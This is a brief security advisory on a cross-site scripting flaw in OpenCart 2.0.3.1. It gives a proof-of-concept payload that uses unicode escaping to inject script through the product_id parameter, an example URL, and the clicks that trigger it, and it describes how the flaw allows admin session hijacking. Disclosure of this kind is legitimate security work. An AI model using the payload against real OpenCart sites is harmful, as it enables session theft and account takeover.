########################### # OpenCart 2.0.3.1 Cross Site Scripting Vulnerability ########################### Information -------------------- Author: Hamed Izadi Email: array("hamedizadi", "@", "gmail", ".com"); Name: XSS Vulnerability in OpenCart Affected Software : OpenCart Affected Versions: v2.0.3.1 and possibly below Vendor Homepage : http://www.opencart.com Vulnerability Type : Cross-site Scripting Severity : Important Description -------------------- By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in users session. This means that the malicious hacker can change the logged in users password and invalidate the session of the victim while the hacker maintains access. As seen from the XSS example in this article, if a web application is vulnerable to cross-site scripting and the administrators session is hijacked, the malicious hacker exploiting the vulnerability will have full admin privileges on that web application. Technical Details -------------------- Proof of Concept URLs for XSS in OpenCart v2.0.3.1: /opencart/index.php?route=product/product&product_id=1 (product_id - GET) XSS Payload : %27);window[%27al\u0065rt%27](/XSS/);// Example: /opencart/index.php?route=product/product&product_id=1%27);window[%27al\u0065rt%27](/XSS/);// After opening the above URL, click on "Add to Wish List" & "Compare this Product" icons, and view the alert window. Solution -------------------- Upgrade to newer version Credits & Authors -------------------- These issues have been discovered by Hamed Izadi ########################### # Iran # L U Arg ###########################